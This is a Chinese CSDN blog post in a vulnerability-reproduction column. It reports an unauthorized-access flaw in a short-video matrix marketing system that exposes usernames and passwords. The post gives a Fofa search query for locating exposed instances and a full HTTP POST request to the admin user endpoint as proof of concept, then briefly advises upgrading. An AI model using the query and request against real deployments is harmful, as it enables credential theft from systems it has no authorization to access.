短视频矩阵营销系统 前台未授权访问导致信息泄露

已于 2024-09-03 09:34:00 修改
阅读量57 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全
于 2024-09-03 09:09:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141847002
版权

0x01 漏洞描述:

短视频矩阵系统是一种整合多平台短视频内容发布和管理的工具,旨在通过统一的后台实现对视频素材的高效管理、编辑和分发。该系统能够支持多个社交媒体平台的账号同步,优化视频营销策略,提高品牌曝光率,并通过数据分析帮助用户深入了解受众偏好,从而提升内容创作的针对性和效果。在user接口中存在未授权访问导致用户名密码泄露。

0x02 搜索语句:

Fofa:title="短视频矩阵营销系统"

0x03 漏洞复现:

POST /index.php/admin/user/index.html?page=1 HTTP/2
Host: your-ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

​​​​​​​

0x04 修复建议:​​​​​​​

官方已更新补丁,请升级至最新版本。

iSee857
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
信息系统项目管理师】【理解+题目】【信息系统信息化】
家养一只小水牛的博客
03-05 6050
文章目录1)信息系统信息信息质量七大属性信息的传输模型信息从小到大五个层次信息化的内涵国家级信息系统信息化六要素(上鹰下鸡左人右龟)信息系统生命周期 (四大五小)2)信息系统开发方法结构化方法/生命周期法 structured method面向对象方法 object-oriented原型化方法/快速原型法/原型法 prototyping面向服务 service-oriented3)常规信息...
内容管理系统CMS学习总结
bcbobo21cn的专栏
09-01 1万+
CMS (内容管理系统) CMS是Content Management System的缩写,意为"内容管理系统"。 内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场。对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解。 中文名 网站内容管理系统 外文名 CMS  全    名 Content Management System  意    为 内容管理系统
架构师重要知识点100条
feritylamb的博客
11-03 383
系统需求:是从系统的角度来说明软件的需求,包括功能需求、非功能需求和设计约束等。功能需求也称为行为需求,它规定了开发人员必须在系统中实现的软件功能,用户利用这些功能来完成任务,满足。程的整体性和全局性,系统开发过程工程化,文档资料标准化。第三个阶段的方法在综合考虑企业内外环境的情况下,以集成为核心,围绕企业战略需求进行的信息系。以粗粒度、松散耦合的系统功能为核心,强调系统功能的标准化和构件化,加强了系统的灵活性、可复。这种系统在各自的局部领域里工作良好,但对于整个企业来说,存在多个这样的系统,不同的系统
数据运营平台-基础架构
戰士博客
11-23 3580
基础架构建设
高负载高并发网站架构分析
热门推荐
leirainy的专栏
12-21 5万+
由于自己正在做一个高性能大用户量的论坛程序,对高性能高并发服务器架构比较感兴趣,于是在网上收集了不少这方面的资料和大家分享。希望能和大家交流 msn: defender_ios@hotmail.com ———————————————————————————————————————  初创网站与开源软件 6  谈谈大型高负载网站服务器的优化心得! 8  Lighttpd+S
2022爱分析·国央企数字化实践报告
爱分析ifenxi
07-08 2649
2022爱分析·国央企数字化实践报告
2021爱分析・区域性银行数字化厂商全景报告
爱分析ifenxi
12-02 1万+
报告编委 报告指导人 张 扬 爱分析联合创始人&首席分析师 报告执笔人 孙文瑞 爱分析高级分析师 李 娜 爱分析分析师 戴 甜 爱分析分析师 目录 研究范围定义 全场景地图 场景定义与厂商解读 入选厂商列表 1. 研究范围定义 研究范围 随着金融监管的加强与金融规范的完善,以及受国有大行、股份制银行、互联网银行和外资银行的挤压,区域性银行面临着“不变则衰”的发展困局。 本次银行数字化厂商全景报告的研究范围为大中型区域性银行,即经营范围限定在某一区域(多为省、市、县、乡),资.
2021爱分析・区域性银行数字化实践报告
爱分析ifenxi
09-28 6477
报告编委 报告指导人 张扬 爱分析 联合创始人&首席分析师 报告执笔人 孙文瑞 爱分析 高级分析师 李娜 戴甜 爱分析 爱分析 分析师 分析师 外部专家(按姓氏拼音排序) 陈宇凌 帆软 银行行业负责人 董鑫 思必驰 智能服务事业部产品总监 葛晓波 擎创科技 联合创始人&CTO 李亚桐 声扬科技 联合创始人&CEO 彭小欢 声网 品牌市场总经理 王翱宇 谐云 CEO 王沂恩 网易云信 金融行业负责人 阅微 同.
全面了解量化风险管理-转载 风控搭建的可以一看
weixin_46727089的博客
04-21 8093
8 过去400年间,只有保险公司始终积极从事风险管理活动;150年前,风险管理的范围开始扩大到信用风险和市场风险;最近40年,市场剧变让风险变得越来越复杂,潜在成本和来机遇难以把握,企业开始有意识地从公司层面管理风险;20世纪80年代起, 企业在识别和管理风险上投入更多精力,带有“风险”的头衔成为新的职位; 这个领域,逐渐形成了自己的语言。 全文总计1.9w字,因内容较长,可分四...
抖音账号矩阵系统/抖音seo霸屏系统/抖音矩阵seo系统源码/独立部署
ZFP985的博客
06-28 2614
抖音账号矩阵系统/抖音seo霸屏系统/抖音矩阵seo系统源码/独立部署,技术团队如何围绕抖音矩阵关键词霸屏来做开发?来做到抖音seo优化达到账号排名效果,关键词起到至关重要的作用,依托于抖音平台的正规权限。所在抖音开放者平台申请的的接口来做真正合规的产品开发。当普通对象属性更改后,触发所绑定的 onChange 回调;能更改属性的有 set 和 deleteProperty 这两个 trap,在其中调用 onChange 方法即可 抖音矩阵源码布局,视频矩阵源码管理系统的主要理论逻辑,依托于视频正常规则
视频会议系列】亿联视频会议产品矩阵简介
CSDN明星博主,认证博客专家,视频、Matlab领域优质创作者。
03-20 2万+
DATE: 2021.3.20 文章目录前言零、融合通信 UME一、视频话机 SIP二、视频会议系统 VCS (Video Conference System)(1)云视频会议:(2)会议室终端:三、视频会议服务器 YMS(Yealink Meeting Server):私有化部署四、USB设备五、微软Teams六、Zoom Rooms 前言 亿联网络对不同细分群体和场景的共性需求进行深入的总结和分析,推出了三大产品类型,包括面向桌面的语音终端、面向会议的会议音视频方案,以及面向个人场景的云办公终端,并打
小红书矩阵营销是什么?多账号如何管理?浅谈小红书矩阵玩法
2301_77496977的博客
04-19 5592
小红书现在越来越火热了,因为它是一款生活方式分享平台,为用户提供好物分享的社区。那么怎么搭建小红书矩阵营销的方法?自媒体多账号管理又该如何实现呢?今天小编就来给大家进行分享!
SLAM_信息矩阵&协方差矩阵
惊鸿一博
03-02 5365
信息矩阵是协方差矩阵的一个逆矩阵,这个怎么理解呢?没什么意义,香农形式,这里是推导出来的,只是换了一种数学表达形式,那为什么需要信息矩阵呢?
使用matlab编写协方差矩阵计算矩阵
weixin_41855010的博客
05-08 8144
Dr.Can在他的教学视频(【卡尔曼滤波器】2_数学基础_数据融合_协方差矩阵_状态空间方程_观测器问题)中使用了足球运动员的数据介绍了协方差矩阵的概念和计算方法,原始数据如下图,那么协方差矩阵到底是什么?他有什么用?我们怎么计算协方差矩阵?如何编写程序让计算机帮助我们计算协方差矩阵呢? 协方差矩阵其实是用来描述一个数据集中不同字段(属性)数据之间的关联程度的。百度词条的解释是: 协方差(Covariance)在概率论和统计学中用于衡量两个变量的总体误差。而方差是协方差的一种特殊情况,即当两个变量是相同
【盖世汽车-注册安全分析报告】
09-02 789
盖世汽车(上海盖世网络技术有限公司)是汽车产业专业的信息服务平台,为企业及行业人士提供一站式服务。
[图解]SysML和EA建模住宅安全系统-活动作为块
rolt的专栏
08-30 1194
然后看它们之间的各种各样的依赖关系
【一嗨租车-注册安全分析报告-滑动验证加载不正常导致安全隐患】
最新发布
09-02 773
一嗨租车创立于2006年1月,主要为个人和政企用户提供综合汽车出行服务,一嗨租车于北京时间2014年11月18日晚9点45分,正式登陆美国纽交所挂牌交易, 作为美股上市公司,拥有雄厚的技术实力,但采用的是通俗的滑动验证产品,并且不能正常加载导致安全隐患。即使问题解决,其安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全
Web3开发与安全:6个月高效学习路径
weixin_47075747的博客
08-30 1384
这份计划应该能帮助你系统地学习智能合约开发和安全审计技能,同时克服英语的障碍。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值